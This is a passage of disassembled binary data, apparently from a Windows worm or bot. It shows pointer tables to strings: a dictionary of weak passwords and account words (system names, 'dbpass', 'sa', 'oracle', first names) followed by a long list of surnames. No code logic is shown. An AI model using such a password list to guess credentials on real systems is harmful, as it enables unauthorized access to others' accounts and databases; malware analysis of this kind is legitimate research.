dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser_0 ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
dd offset aSusan ; "susan"
dd offset aPeter ; "peter"
dd offset aBrian ; "brian"
dd offset aLee ; "lee"
dd offset aNeil ; "neil"
dd offset aIan ; "ian"
dd offset aChris ; "chris"
dd offset aEric ; "eric"
dd offset aGeorge ; "george"
dd offset aKate ; "kate"
dd offset aBob ; "bob"
dd offset aKatie ; "katie"
dd offset aMary ; "mary"
dd offset aLogin ; "login"
dd offset aLoginpass ; "loginpass"
dd offset aTechnical ; "technical"
dd offset aBackup ; "backup"
dd offset aExchange ; "exchange"
dd offset aFuck ; "fuck"
dd offset aBitch ; "bitch"
dd offset aSlut ; "slut"
dd offset aSex ; "sex"
dd offset aGod ; "god"
dd offset aHell ; "hell"
dd offset aHello ; "hello"
dd offset aDomain ; "domain"
dd offset aDomainpass ; "domainpass"
dd offset aDomainpassword ; "domainpassword"
dd offset aDatabase ; "database"
dd offset aAccess ; "access"
dd offset aDbpass ; "dbpass"
dd offset aDbpassword ; "dbpassword"
dd offset aDatabasepass ; "databasepass"
dd offset aData ; "data"
dd offset aDatabasepasswo ; "databasepassword"
dd offset aDb1 ; "db1"
dd offset aDb2 ; "db2"
dd offset aDb1234 ; "db1234"
dd offset aSa ; "sa"
dd offset aSql ; "sql"
dd offset aSqlpassoainsta ; "sqlpassoainstall"
dd offset aOrainstall ; "orainstall"
dd offset aOracle ; "oracle"
dd offset aIbm ; "ibm"
dd offset aCisco_0 ; "cisco"
dd offset aDell ; "dell"
dd offset aCompaq ; "compaq"
dd offset aSiemens ; "siemens"
dd offset aHp ; "hp"
dd offset aNokia ; "nokia"
dd offset aXp ; "xp"
dd offset aControl ; "control"
dd offset aOffice ; "office"
dd offset aBlank ; "blank"
dd offset aWinpass ; "winpass"
dd offset aMain ; "main"
dd offset aLan ; "lan"
dd offset aInternet ; "internet"
dd offset aIntranet ; "intranet"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
align 8
dword_43C498 dd 10h ; DATA XREF: sub_40274D+A0B�r
; sub_40274D+A37�r ...
align 10h
dword_43C4A0 dd 6C616572h ; DATA XREF: sub_40AB83+F�r
dd 2 dup(0)
dword_43C4AC dd 0 ; DATA XREF: sub_40AB83:loc_40ABAA�r
off_43C4B0 dd offset sub_40A800 ; DATA XREF: sub_40AB83+4A�r
aConst db 'const',0
align 10h
dd 1, 40A86Ch, 7474656Ch, 7265h, 0
dd 2, 40A8CAh, 706D6F63h, 2 dup(0)
dd 3, 40A917h, 6E756F63h, 797274h, 0
dd 4, 40A986h, 736Fh, 2 dup(0)
dd 5, 40A9FBh
off_43C518 dd offset aAbdulrazak ; DATA XREF: sub_40A800+20�r
; "Abdulrazak"
dd offset aAckerman ; "Ackerman"
dd offset aAdams ; "Adams"
dd offset aAddison ; "Addison"
dd offset aAdelstein ; "Adelstein"
dd offset aAdibe ; "Adibe"
dd offset aAdorno ; "Adorno"
dd offset aAhlers ; "Ahlers"
dd offset aAlavi ; "Alavi"
dd offset aAlcorn ; "Alcorn"
dd offset aAlda ; "Alda"
dd offset aAleks ; "Aleks"
dd offset aAllison ; "Allison"
dd offset aAlongi ; "Alongi"
dd offset aAltavilla ; "Altavilla"
dd offset aAltenberger ; "Altenberger"
dd offset aAltenhofen ; "Altenhofen"
dd offset aAmaral ; "Amaral"
dd offset aAmatangelo ; "Amatangelo"
dd offset aAmeer ; "Ameer"
dd offset aAmsden ; "Amsden"
dd offset aAnand ; "Anand"
dd offset aAndel ; "Andel"
dd offset aAndo ; "Ando"
dd offset aAndrelus ; "Andrelus"
dd offset aAndron ; "Andron"
dd offset aAnfinrud ; "Anfinrud"
dd offset aAnsley ; "Ansley"
dd offset aAnthony ; "Anthony"
dd offset aAntos ; "Antos"
dd offset aArbia ; "Arbia"
dd offset aArduini ; "Arduini"
dd offset aArellano ; "Arellano"
dd offset aAristotle ; "Aristotle"
dd offset aArjas ; "Arjas"
dd offset aArky ; "Arky"
dd offset aAtkins ; "Atkins"
dd offset aAugustus ; "Augustus"
dd offset aAurelius ; "Aurelius"
dd offset aAxelrod ; "Axelrod"
dd offset aAxworthy ; "Axworthy"
dd offset aAyiemba ; "Ayiemba"
dd offset aAykroyd ; "Aykroyd"
dd offset aAyling ; "Ayling"
dd offset aAzima ; "Azima"
dd offset aBachmuth ; "Bachmuth"
dd offset aBackus ; "Backus"
dd offset aBady ; "Bady"
dd offset aBaglivo ; "Baglivo"
dd offset aBagnold ; "Bagnold"
dd offset aBailar ; "Bailar"
dd offset aBakanowsky ; "Bakanowsky"
dd offset aBaleja ; "Baleja"
dd offset aBallatori ; "Ballatori"
dd offset aBallew ; "Ballew"
dd offset aBaltz ; "Baltz"
dd offset aBanta ; "Banta"
dd offset aBarabesi ; "Barabesi"
dd offset aBarajas ; "Barajas"
dd offset aBaranczak ; "Baranczak"
dd offset aBaranowska ; "Baranowska"
dd offset aBarberi ; "Barberi"
dd offset aBarbetti ; "Barbetti"
dd offset aBarneson ; "Barneson"
dd offset aBarnett ; "Barnett"
dd offset aBarriola ; "Barriola"
dd offset aBarry ; "Barry"
dd offset aBartholomew ; "Bartholomew"
dd offset aBartolome ; "Bartolome"
dd offset aBartoo ; "Bartoo"
dd offset aBasavappa ; "Basavappa"
dd offset aBashevis ; "Bashevis"
dd offset aBatchelder ; "Batchelder"
dd offset aBaumiller ; "Baumiller"
dd offset aBayles ; "Bayles"
dd offset aBayo ; "Bayo"
dd offset aBeacon ; "Beacon"
dd offset aBeal ; "Beal"
dd offset aBean ; "Bean"
dd offset aBeckman ; "Beckman"
dd offset aBeder ; "Beder"
dd offset aBedford ; "Bedford"
dd offset aBehenna ; "Behenna"
dd offset aBelanger ; "Belanger"
dd offset aBelaoussof ; "Belaoussof"
dd offset aBelfer ; "Belfer"
dd offset aBelinCollart ; "Belin-Collart"
dd offset aBellavance ; "Bellavance"
dd offset aBellhouse ; "Bellhouse"
dd offset aBellini ; "Bellini"
dd offset aBelloc ; "Belloc"
dd offset aBenedictDye ; "Benedict-Dye"
dd offset aBergson ; "Bergson"
dd offset aBerkeJenkins ; "Berke-Jenkins"
dd offset aBernardo ; "Bernardo"
dd offset aBernassola ; "Bernassola"
dd offset aBernston ; "Bernston"
dd offset aBerrizbeitia ; "Berrizbeitia"
dd offset aBetti ; "Betti"
dd offset aBeynart ; "Beynart"
dd offset aBiagioli ; "Biagioli"
dd offset aBickel ; "Bickel"
dd offset aBinion ; "Binion"
dd offset aBir ; "Bir"
dd offset aBisema ; "Bisema"
dd offset aBisho ; "Bisho"
dd offset aBlackbourn ; "Blackbourn"
dd offset aBlackwell ; "Blackwell"
dd offset aBlagg ; "Blagg"
dd offset aBlakemore ; "Blakemore"
dd offset aBlanke ; "Blanke"
dd offset aBliss ; "Bliss"
dd offset aBlizard ; "Blizard"
dd offset aBloch ; "Bloch"
dd offset aBloembergen ; "Bloembergen"
dd offset aBloemhof ; "Bloemhof"
dd offset aBloxham ; "Bloxham"
dd offset aBlyth ; "Blyth"
dd offset aBolger ; "Bolger"
dd offset aBolick ; "Bolick"
dd offset aBollinger ; "Bollinger"
dd offset aBologna ; "Bologna"
dd offset aBoner ; "Boner"
dd offset aBonham ; "Bonham"
dd offset aBoniface ; "Boniface"
dd offset aBontempo ; "Bontempo"
dd offset aBook ; "Book"
dd offset aBookbinder ; "Bookbinder"
dd offset aBoone ; "Boone"
dd offset aBoorstin ; "Boorstin"
dd offset aBorack ; "Borack"
dd offset aBorden ; "Borden"
dd offset aBossi ; "Bossi"
dd offset aBothman ; "Bothman"
dd offset aBotosh ; "Botosh"
dd offset aBoudin ; "Boudin"
dd offset aBoudrot ; "Boudrot"
dd offset aBourneuf ; "Bourneuf"
dd offset aBowers ; "Bowers"
dd offset aBoxer ; "Boxer"
dd offset aBoyajian ; "Boyajian"
dd offset aBoyes ; "Boyes"
dd offset aBoyland ; "Boyland"
dd offset aBoym ; "Boym"
dd offset aBoyne ; "Boyne"
dd offset aBracalente ; "Bracalente"
dd offset aBradac ; "Bradac"
dd offset aBradach ; "Bradach"
dd offset aBrecht ; "Brecht"
dd offset aBreed ; "Breed"
dd offset aBrenan ; "Brenan"
dd offset aBrennan ; "Brennan"
dd offset aBrewer ; "Brewer"
dd offset aBrewer ; "Brewer"
dd offset aBridgeman ; "Bridgeman"
dd offset aBridges ; "Bridges"
dd offset aBrinton ; "Brinton"
dd offset aBritz ; "Britz"
dd offset aBroca ; "Broca"
dd offset aBrook ; "Brook"
dd offset aBrzycki ; "Brzycki"
dd offset aBuchan ; "Buchan"
dd offset aBudding ; "Budding"
dd offset aBullard ; "Bullard"
dd offset aBunton ; "Bunton"
dd offset aBurden ; "Burden"
dd offset aBurdzy ; "Burdzy"
dd offset aBurke ; "Burke"
dd offset aBurridge ; "Burridge"
dd offset aBusetta ; "Busetta"
dd offset aByatt ; "Byatt"
dd offset aByerly ; "Byerly"
dd offset aByrd ; "Byrd"
dd offset aCage ; "Cage"
dd offset aCalnan ; "Calnan"
dd offset aCammelli ; "Cammelli"
dd offset aCammilleri ; "Cammilleri"
dd offset aCanley ; "Canley"
dd offset aCapanni ; "Capanni"
dd offset aCaperton ; "Caperton"
dd offset aCapocaccia ; "Capocaccia"
dd offset aCapodilupo ; "Capodilupo"
dd offset aCappuccio ; "Cappuccio"
dd offset aCapursi ; "Capursi"
dd offset aCaratozzolo ; "Caratozzolo"
dd offset aCarayannopoulo ; "Carayannopoulos"
dd offset aCarlin ; "Carlin"
dd offset aCarlos ; "Carlos"
dd offset aCarlyle ; "Carlyle"
dd offset aCarmichael ; "Carmichael"
dd offset aCaroti ; "Caroti"
dd offset aCarper ; "Carper"
dd offset aCartmill ; "Cartmill"
dd offset aCascio ; "Cascio"
dd offset aCase ; "Case"
dd offset aCaspar ; "Caspar"
dd offset aCastelda ; "Castelda"
dd offset aCavanagh ; "Cavanagh"
dd offset aCavell ; "Cavell"
dd offset aCeniceros ; "Ceniceros"
dd offset aCerioli ; "Cerioli"
dd offset aChapman ; "Chapman"
dd offset aCharles ; "Charles"
dd offset aCheang ; "Cheang"
dd offset aCherry ; "Cherry"
dd offset aChervinsky ; "Chervinsky"
dd offset aChiassino ; "Chiassino"
dd offset aChien ; "Chien"
dd offset aChildress ; "Childress"
dd offset aChilds ; "Childs"
dd offset aChinipardaz ; "Chinipardaz"
dd offset aChinman ; "Chinman"
dd offset aChristenson ; "Christenson"
dd offset aChristian ; "Christian"
dd offset aChristiano ; "Christiano"
dd offset aChristie ; "Christie"
dd offset aChristopher ; "Christopher"
dd offset aChu ; "Chu"
dd offset aChupasko ; "Chupasko"
dd offset aChurch ; "Church"
dd offset aCiampaglia ; "Ciampaglia"
dd offset aCicero ; "Cicero"
dd offset aCifarelli ; "Cifarelli"
dd offset aClaffey ; "Claffey"
dd offset aClancy ; "Clancy"
dd offset aClark ; "Clark"
dd offset aClement ; "Clement"
dd offset aClifton ; "Clifton"
dd offset aClow ; "Clow"
dd offset aCoblenz ; "Coblenz"
dd offset aCoito ; "Coito"
dd offset aColdren ; "Coldren"
dd offset aColella ; "Colella"
dd offset aCollard ; "Collard"
dd offset aCollis ; "Collis"
dd offset aCompton ; "Compton"
dd offset aCompton ; "Compton"
dd offset aComstock ; "Comstock"
dd offset aConcino ; "Concino"
dd offset aCondodina ; "Condodina"
dd offset aConnors ; "Connors"
dd offset aCorey ; "Corey"
dd offset aCornish ; "Cornish"
dd offset aCosmides ; "Cosmides"
dd offset aCounter ; "Counter"
dd offset aCoutaux ; "Coutaux"
dd offset aCrawford ; "Crawford"
dd offset aCrocker ; "Crocker"
dd offset aCroshaw ; "Croshaw"
dd offset aCroxen ; "Croxen"
dd offset aCroxton ; "Croxton"
dd offset aCui ; "Cui"
dd offset aCurrier ; "Currier"
dd offset aCutler ; "Cutler"
dd offset aCvek ; "Cvek"
dd offset aCyders ; "Cyders"
dd offset aDasilva ; "daSilva"
dd offset aDaldalian ; "Daldalian"
dd offset aDaly ; "Daly"
dd offset aDAmbra ; "D'Ambra"
dd offset aDanieli ; "Danieli"
dd offset aDante ; "Dante"
dd offset aDapice ; "Dapice"
dd offset aDArcangelo ; "D'arcangelo"
dd offset aDas ; "Das"
dd offset aDasgupta ; "Dasgupta"
dd offset aDaskalu ; "Daskalu"
dd offset aDavid ; "David"
dd offset aDawkins ; "Dawkins"
dd offset aDegennaro ; "DeGennaro"
dd offset aDelapena ; "DeLaPena"
dd offset aDelEnclos ; "del'Enclos"
dd offset aDerousse ; "deRousse"
dd offset aDebroff ; "Debroff"
dd offset aDees ; "Dees"
dd offset aDefeciani ; "Defeciani"
dd offset aDelattre ; "Delattre"
dd offset aDeleonRendon ; "Deleon-Rendon"
dd offset aDelger ; "Delger"
dd offset aDellAcqua ; "Dell'acqua"
dd offset aDeming ; "Deming"
dd offset aDempster ; "Dempster"
dd offset aDemusz ; "Demusz"
dd offset aDenault ; "Denault"
dd offset aDenham ; "Denham"
dd offset aDenison ; "Denison"
dd offset aDesombre ; "Desombre"
dd offset aDeutsch ; "Deutsch"
dd offset aDFini ; "D'fini"
dd offset aDicks ; "Dicks"
dd offset aDiefenbach ; "Diefenbach"
dd offset aDifabio ; "Difabio"
dd offset aDifronzo ; "Difronzo"
dd offset aDilworth ; "Dilworth"
dd offset aDionysius ; "Dionysius"
dd offset aDirksen ; "Dirksen"
dd offset aDockery ; "Dockery"
dd offset aDoherty ; "Doherty"
dd offset aDonahue ; "Donahue"
dd offset aDonner ; "Donner"
dd offset aDoonan ; "Doonan"
dd offset aDore ; "Dore"
dd offset aDorf ; "Dorf"
dd offset aDosi ; "Dosi"
dd offset aDoty ; "Doty"
dd offset aDoug ; "Doug"
dd offset aDowsland ; "Dowsland"
dd offset aDrinker ; "Drinker"
dd offset aDSouza ; "D'souza"
dd offset aDuffin ; "Duffin"
dd offset aDurrett ; "Durrett"
dd offset aDussault ; "Dussault"
dd offset aDwyer ; "Dwyer"
dd offset aEardley ; "Eardley"
dd offset aEbeling ; "Ebeling"
dd offset aEckel ; "Eckel"
dd offset aEdley ; "Edley"
dd offset aEdner ; "Edner"
dd offset aEdward ; "Edward"
dd offset aEickenhorst ; "Eickenhorst"
dd offset aEliasson ; "Eliasson"
dd offset aElmendorf ; "Elmendorf"
dd offset aElmerick ; "Elmerick"
dd offset aElvis ; "Elvis"
dd offset aEncinas ; "Encinas"
dd offset aEnyeart ; "Enyeart"
dd offset aEppling ; "Eppling"
dd offset aErbach ; "Erbach"
dd offset aErdman ; "Erdman"
dd offset aErdos ; "Erdos"
dd offset aErez ; "Erez"
dd offset aEspinoza ; "Espinoza"
dd offset aEstes ; "Estes"
dd offset aEtter ; "Etter"
dd offset aEuripides ; "Euripides"
dd offset aEverett ; "Everett"
dd offset aFabbris ; "Fabbris"
dd offset aFagan ; "Fagan"
dd offset aFaioes ; "Faioes"
dd offset aFalcoAcosta ; "Falco-Acosta"
dd offset aFalorsi ; "Falorsi"
dd offset aFaris ; "Faris"
dd offset aFarone ; "Farone"
dd offset aFarren ; "Farren"
dd offset aFasso ; "Fasso'"
dd offset aFates ; "Fates"
dd offset aFeigenbaum ; "Feigenbaum"
dd offset aFejzo ; "Fejzo"
dd offset aFeldman ; "Feldman"
dd offset aFernald ; "Fernald"
dd offset aFernandes ; "Fernandes"
dd offset aFerrante ; "Ferrante"
dd offset aFerriell ; "Ferriell"
dd offset aFeuer ; "Feuer"
dd offset aFido ; "Fido"
dd offset aField ; "Field"
dd offset aFink ; "Fink"
dd offset aFinkelstein ; "Finkelstein"
dd offset aFinnegan ; "Finnegan"
dd offset aFiorina ; "Fiorina"
dd offset aFisk ; "Fisk"
dd offset aFitzmaurice ; "Fitzmaurice"
dd offset aFlier ; "Flier"
dd offset aFlores ; "Flores"
dd offset aFolks ; "Folks"
dd offset aForester ; "Forester"
dd offset aFortes ; "Fortes"
dd offset aFortier ; "Fortier"
dd offset aFossey ; "Fossey"
dd offset aFossi ; "Fossi"
dd offset aFrancisco ; "Francisco"
dd offset aFranklinKenea ; "Franklin-Kenea"
dd offset aFranz ; "Franz"
dd offset aFrazierDavis ; "Frazier-Davis"
dd offset aFreid ; "Freid"
dd offset aFreundlich ; "Freundlich"
dd offset aFried ; "Fried"
dd offset aFriedland ; "Friedland"
dd offset aFrisken ; "Frisken"
dd offset aFrowiss ; "Frowiss"
dd offset aFryberger ; "Fryberger"
dd offset aFrye ; "Frye"
dd offset aFujiiAbe ; "Fujii-Abe"
dd offset aFuller ; "Fuller"
dd offset aFurth ; "Furth"
dd offset aFusaro ; "Fusaro"
dd offset aGabrielli ; "Gabrielli"
dd offset aGaggiotti ; "Gaggiotti"
dd offset aGaleotti ; "Galeotti"
dd offset aGalwey ; "Galwey"
dd offset aGambini ; "Gambini"
dd offset aGarfield ; "Garfield"
dd offset aGarman ; "Garman"
dd offset aGaronna ; "Garonna"
dd offset aGeller ; "Geller"
dd offset aGemberling ; "Gemberling"
dd offset aGeorgi ; "Georgi"
dd offset aGerrett ; "Gerrett"
dd offset aGhorai ; "Ghorai"
dd offset aGibbens ; "Gibbens"
dd offset aGibson ; "Gibson"
dd offset aGilbert ; "Gilbert"
dd offset aGili ; "Gili"
dd offset aGill ; "Gill"
dd offset aGillispie ; "Gillispie"
dd offset aGist ; "Gist"
dd offset aGleason ; "Gleason"
dd offset aGlegg ; "Glegg"
dd offset aGlendon ; "Glendon"
dd offset aGoldfarb ; "Goldfarb"
dd offset aGoncalves ; "Goncalves"
dd offset aGood ; "Good"
dd offset aGoodearl ; "Goodearl"
dd offset aGoody ; "Goody"
dd offset aGozzi ; "Gozzi"
dd offset aGravell ; "Gravell"
dd offset aGreenberg ; "Greenberg"
dd offset aGreenfeld ; "Greenfeld"
dd offset aGriffiths ; "Griffiths"
dd offset aGrigoletto ; "Grigoletto"
dd offset aGrummell ; "Grummell"
dd offset aGruner ; "Gruner"
dd offset aGruppe ; "Gruppe"
dd offset aGuenthart ; "Guenthart"
dd offset aGunn ; "Gunn"
dd offset aGuo ; "Guo"
dd offset aHa ; "Ha"
dd offset aHaar ; "Haar"
dd offset aHackman ; "Hackman"
dd offset aHackshaw ; "Hackshaw"
dd offset aHaley ; "Haley"
dd offset aHalkias ; "Halkias"
dd offset aHallowell ; "Hallowell"
dd offset aHalpert ; "Halpert"
dd offset aHambarzumjan ; "Hambarzumjan"
dd offset aHamer ; "Hamer"
dd offset aHammerness ; "Hammerness"
dd offset aHand ; "Hand"
dd offset aHanssen ; "Hanssen"
dd offset aHarding ; "Harding"
dd offset aHargraves ; "Hargraves"
dd offset aHarlow ; "Harlow"
dd offset aHarrigan ; "Harrigan"
dd offset aHartman ; "Hartman"
dd offset aHartmann ; "Hartmann"
dd offset aHartnett ; "Hartnett"
dd offset aHarwell ; "Harwell"
dd offset aHaviaras ; "Haviaras"
dd offset aHawkes ; "Hawkes"
dd offset aHayes ; "Hayes"
dd offset aHaynes ; "Haynes"
dd offset aHazlewood ; "Hazlewood"
dd offset aHeermans ; "Heermans"
dd offset aHeft ; "Heft"
dd offset aHeiland ; "Heiland"
dd offset aHellman ; "Hellman"
dd offset aHellmiss ; "Hellmiss"
dd offset aHelprin ; "Helprin"
dd offset aHemphill ; "Hemphill"
dd offset aHenery ; "Henery"
dd offset aHenrichs ; "Henrichs"
dd offset aHernandez ; "Hernandez"
dd offset aHerrera ; "Herrera"
dd offset aHester ; "Hester"
dd offset aHeubert ; "Heubert"
dd offset aHeyeck ; "Heyeck"
dd offset aHimmelfarb ; "Himmelfarb"
dd offset aHind ; "Hind"
dd offset aHirst ; "Hirst"
dd offset aHitchcock ; "Hitchcock"
dd offset aHoang ; "Hoang"
dd offset aHock ; "Hock"
dd offset aHoffer ; "Hoffer"
dd offset aHoffman ; "Hoffman"
dd offset aHokanson ; "Hokanson"
dd offset aHokoda ; "Hokoda"
dd offset aHolmes ; "Holmes"
dd offset aHoloien ; "Holoien"
dd offset aHolter ; "Holter"
dd offset aHolway ; "Holway"
dd offset aHolzman ; "Holzman"
dd offset aHooker ; "Hooker"
dd offset aHopkins ; "Hopkins"
dd offset aHorsley ; "Horsley"
dd offset aHoshida ; "Hoshida"
dd offset aHostage ; "Hostage"
dd offset aHottle ; "Hottle"
dd offset aHoward ; "Howard"
dd offset aHoy ; "Hoy"
dd offset aHuey ; "Huey"
dd offset aHuidekoper ; "Huidekoper"
dd offset aHungerford ; "Hungerford"
dd offset aHuntington ; "Huntington"
dd offset aHupp ; "Hupp"
dd offset aHurtubise ; "Hurtubise"
dd offset aHutchings ; "Hutchings"
dd offset aHyde ; "Hyde"
dd offset aIaquinta ; "Iaquinta"
dd offset aIchikawa ; "Ichikawa"
dd offset aIgarashi ; "Igarashi"
dd offset aInamura ; "Inamura"
dd offset aInniss ; "Inniss"
dd offset aIsaac ; "Isaac"
dd offset aIsaievych ; "Isaievych"
dd offset aIsbill ; "Isbill"
dd offset aIsserman ; "Isserman"
dd offset aIyer ; "Iyer"
dd offset aJacenko ; "Jacenko"
dd offset aJackson ; "Jackson"
dd offset aJagers ; "Jagers"
dd offset aJagger ; "Jagger"
dd offset aJagoe ; "Jagoe"
dd offset aJain ; "Jain"
dd offset aJamil ; "Jamil"
dd offset aJanjigian ; "Janjigian"
dd offset aJarnagin ; "Jarnagin"
dd offset aJarrell ; "Jarrell"
dd offset aJay ; "Jay"
dd offset aJeffers ; "Jeffers"
dd offset aJellis ; "Jellis"
dd offset aJenkins ; "Jenkins"
dd offset aJespersen ; "Jespersen"
dd offset aJewett ; "Jewett"
dd offset aJohannesson ; "Johannesson"
dd offset aJohannsen ; "Johannsen"
dd offset aJohns ; "Johns"
dd offset aJolly ; "Jolly"
dd offset aJorgensen ; "Jorgensen"
dd offset aJucks ; "Jucks"
dd offset aJuliano ; "Juliano"
dd offset aJulious ; "Julious"
dd offset aKabbash ; "Kabbash"
dd offset aKaboolian ; "Kaboolian"
dd offset aKafadar ; "Kafadar"
dd offset aKalbfleisch ; "Kalbfleisch"
dd offset aKaligian ; "Kaligian"
dd offset aKalil ; "Kalil"
dd offset aKalinowski ; "Kalinowski"
dd offset aKalman ; "Kalman"
dd offset aKamel ; "Kamel"
dd offset aKangis ; "Kangis"
dd offset aKarpouzes ; "Karpouzes"
dd offset aKassower ; "Kassower"
dd offset aKasten ; "Kasten"
dd offset aKawachi ; "Kawachi"
dd offset aKee ; "Kee"
dd offset aKeenan ; "Keenan"
dd offset aKeepper ; "Keepper"
dd offset aKeith ; "Keith"
dd offset aKelker ; "Kelker"
dd offset aKelsey ; "Kelsey"
dd offset aKempton ; "Kempton"
dd offset aKemsley ; "Kemsley"
dd offset aKendall ; "Kendall"
dd offset aKerry ; "Kerry"
dd offset aKeul ; "Keul"
dd offset aKhong ; "Khong"
dd offset aKimmel ; "Kimmel"
dd offset aKimmett ; "Kimmett"
dd offset aKimura ; "Kimura"
dd offset aKindall ; "Kindall"
dd offset aKinsley ; "Kinsley"
dd offset aKippenberger ; "Kippenberger"
dd offset aKirscht ; "Kirscht"
dd offset aKittridge ; "Kittridge"
dd offset aKleckner ; "Kleckner"
dd offset aKleiman ; "Kleiman"
dd offset aKleinfelder ; "Kleinfelder"
dd offset aKlemperer ; "Klemperer"
dd offset aKling ; "Kling"
dd offset aKlinkenborg ; "Klinkenborg"
dd offset aKlint ; "Klint"
dd offset aKnuff ; "Knuff"
dd offset aKobrick ; "Kobrick"
dd offset aKoch ; "Koch"
dd offset aKohn ; "Kohn"
dd offset aKoivumaki ; "Koivumaki"
dd offset aKommer ; "Kommer"
dd offset aKoniaris ; "Koniaris"
dd offset aKonrad ; "Konrad"
dd offset aKool ; "Kool"
dd offset aKorzybski ; "Korzybski"
dd offset aKotter ; "Kotter"
dd offset aKovaks ; "Kovaks"
dd offset aKraemer ; "Kraemer"
dd offset aKrailo ; "Krailo"
dd offset aKrasney ; "Krasney"
dd offset aKraus ; "Kraus"
dd offset aKroemer ; "Kroemer"
dd offset aKrysiak ; "Krysiak"
dd offset aKuenzli ; "Kuenzli"
dd offset aKumar ; "Kumar"
dd offset aKusman ; "Kusman"
dd offset aKuwabara ; "Kuwabara"
dd offset aLa ; "La"
dd offset aLabunka ; "Labunka"
dd offset aLafler ; "Lafler"
dd offset aLaing ; "Laing"
dd offset aLallemant ; "Lallemant"
dd offset aLandes ; "Landes"
dd offset aLankes ; "Lankes"
dd offset aLantieri ; "Lantieri"
dd offset aLanzit ; "Lanzit"
dd offset aLaserna ; "Laserna"
dd offset aLashley ; "Lashley"
dd offset aLawless ; "Lawless"
dd offset aLecar ; "Lecar"
dd offset aLecce ; "Lecce"
dd offset aLeclercq ; "Leclercq"
dd offset aLeite ; "Leite"
dd offset aLenard ; "Lenard"
dd offset aLEnclos ; "l'Enclos"
dd offset aLesser ; "Lesser"
dd offset aLessi ; "Lessi"
dd offset aLiakos ; "Liakos"
dd offset aLidano ; "Lidano"
dd offset aLiem ; "Liem"
dd offset aLight ; "Light"
dd offset aLightfoot ; "Lightfoot"
dd offset aLim ; "Lim"
dd offset aLinares ; "Linares"
dd offset aLinda ; "Linda"
dd offset aLinder ; "Linder"
dd offset aLine ; "Line"
dd offset aLinehan ; "Linehan"
dd offset aLinzee ; "Linzee"
dd offset aLippmann ; "Lippmann"
dd offset aLipponen ; "Lipponen"
dd offset aLittle ; "Little"
dd offset aLitvak ; "Litvak"
dd offset aLivernash ; "Livernash"
dd offset aLivi ; "Livi"
dd offset aLivolsi ; "Livolsi"
dd offset aLizardo ; "Lizardo"
dd offset aLocatelli ; "Locatelli"
dd offset aLongworth ; "Longworth"
dd offset aLoss ; "Loss"
dd offset aLoveman ; "Loveman"
dd offset aLowenstein ; "Lowenstein"
dd offset aLoza ; "Loza"
dd offset aLubin ; "Lubin"
dd offset aLucas ; "Lucas"
dd offset aLuciano ; "Luciano"
dd offset aLuczkow ; "Luczkow"
dd offset aLuecke ; "Luecke"
dd offset aLunetta ; "Lunetta"
dd offset aLuoma ; "Luoma"
dd offset aLussier ; "Lussier"
dd offset aLutcavage ; "Lutcavage"
dd offset aLuzader ; "Luzader"
dd offset aMa ; "Ma"
dd offset aMaccormac ; "Maccormac"
dd offset aMacdonald ; "Macdonald"
dd offset aMaceachern ; "Maceachern"
dd offset aMacintyre ; "Macintyre"
dd offset aMackenney ; "Mackenney"
dd offset aMacmillan ; "MacMillan"
dd offset aMacy ; "Macy"
dd offset aMadigan ; "Madigan"
dd offset aMaggio ; "Maggio"
dd offset aMahony ; "Mahony"
dd offset aMaier ; "Maier"
dd offset aMaineHershey ; "Maine-Hershey"
dd offset aMaisano ; "Maisano"
dd offset aMalatesta ; "Malatesta"
dd offset aMaller ; "Maller"
dd offset aMalova ; "Malova"
dd offset aManalis ; "Manalis"
dd offset aMandel ; "Mandel"
dd offset aManganiello ; "Manganiello"
dd offset aMantovan ; "Mantovan"
dd offset aMarch ; "March"
dd offset aMarchbanks ; "Marchbanks"
dd offset aMarcus ; "Marcus"
dd offset aMargalit ; "Margalit"
dd offset aMargetts ; "Margetts"
dd offset aMarques ; "Marques"
dd offset aMartinez ; "Martinez"
dd offset aMartochio ; "Martochio"
dd offset aMarton ; "Marton"
dd offset aMarubini ; "Marubini"
dd offset aMass ; "Mass"
dd offset aMatalka ; "Matalka"
dd offset aMatarazzo ; "Matarazzo"
dd offset aMatsukata ; "Matsukata"
dd offset aMattson ; "Mattson"
dd offset aMauzy ; "Mauzy"
dd offset aMay ; "May"
dd offset aMazzali ; "Mazzali"
dd offset aMazziotta ; "Mazziotta"
dd offset aMcbride ; "Mcbride"
dd offset aMccaffery ; "Mccaffery"
dd offset aMccall ; "Mccall"
dd offset aMcclearn ; "Mcclearn"
dd offset aMcdowell ; "Mcdowell"
dd offset aMcelroy ; "Mcelroy"
dd offset aMcfadden ; "McFadden"
dd offset aMcghee ; "Mcghee"
dd offset aMcgoldrick ; "Mcgoldrick"
dd offset aMcilroy ; "McIlroy"
dd offset aMcintosh ; "Mcintosh"
dd offset aMckenna ; "Mckenna"
dd offset aMclane ; "Mclane"
dd offset aMclaren ; "Mclaren"
dd offset aMcnealy ; "Mcnealy"
dd offset aMcnulty ; "Mcnulty"
dd offset aMeccariello ; "Meccariello"
dd offset aMemisoglu ; "Memisoglu"
dd offset aMenzies ; "Menzies"
dd offset aMerikoski ; "Merikoski"
dd offset aMerlani ; "Merlani"
dd offset aMerminod ; "Merminod"
dd offset aMerseth ; "Merseth"
dd offset aMerz ; "Merz"
dd offset aMetelka ; "Metelka"
dd offset aMetropolis ; "Metropolis"
dd offset aMeurer ; "Meurer"
dd offset aMichelman ; "Michelman"
dd offset aMiddle ; "Middle"
dd offset aMieher ; "Mieher"
dd offset aMills ; "Mills"
dd offset aMinh ; "Minh"
dd offset aMini ; "Mini"
dd offset aMinichiello ; "Minichiello"
dd offset aGonzalez ; "Gonzalez"
dd offset aMitropoulos ; "Mitropoulos"
dd offset aMittal ; "Mittal"
